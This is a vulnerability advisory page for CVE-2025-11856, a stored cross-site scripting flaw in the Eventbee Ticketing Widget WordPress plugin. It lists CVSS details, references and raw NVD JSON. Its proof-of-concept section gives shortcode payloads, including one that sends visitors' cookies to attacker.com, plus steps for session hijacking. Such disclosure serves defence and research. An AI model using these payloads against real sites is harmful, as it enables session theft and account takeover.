CVE-2025-11856

Description

The Eventbee Ticketing Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eventbeeticketwidget' shortcode in all versions up to, and including, 1.0. This is due to the plugin not properly sanitizing user input and output of several parameters. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Eventbee Ticketing Widget plugin <= 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Stored XSS via Eventbee Ticketing Widget shortcode -->
<!-- Attacker with Contributor+ role can inject malicious script -->

[eventbeeticketwidget id='"><script>alert(document.cookie)</script>']

<!-- More sophisticated payload for session hijacking -->
[eventbeeticketwidget name='"><img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)'>']

<!-- PoC explanation: -->
<!-- 1. Attacker creates/edits a post with Contributor role -->
<!-- 2. Inserts the malicious shortcode payload -->
<!-- 3. When any user views the page, the XSS payload executes -->
<!-- 4. Attacker can steal session cookies or perform actions on behalf of victim -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11856
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11856
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11856/
[4] VulDB https://vuldb.com/cve/CVE-2025-11856
[5] https://plugins.trac.wordpress.org/browser/eventbee-ticketing-widget/tags/1.0/ticket-widget.php#L23
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/7c439193-cc7d-4e40-8585-87cb2c40fe9b?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11856", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:42.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Eventbee Ticketing Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eventbeeticketwidget' shortcode in all versions up to, and including, 1.0. This is due to the plugin not properly sanitizing user input and output of several parameters. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eventbee-ticketing-widget/tags/1.0/ticket-widget.php#L23", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7c439193-cc7d-4e40-8585-87cb2c40fe9b?source=cve", "source": "[email protected]"}]}}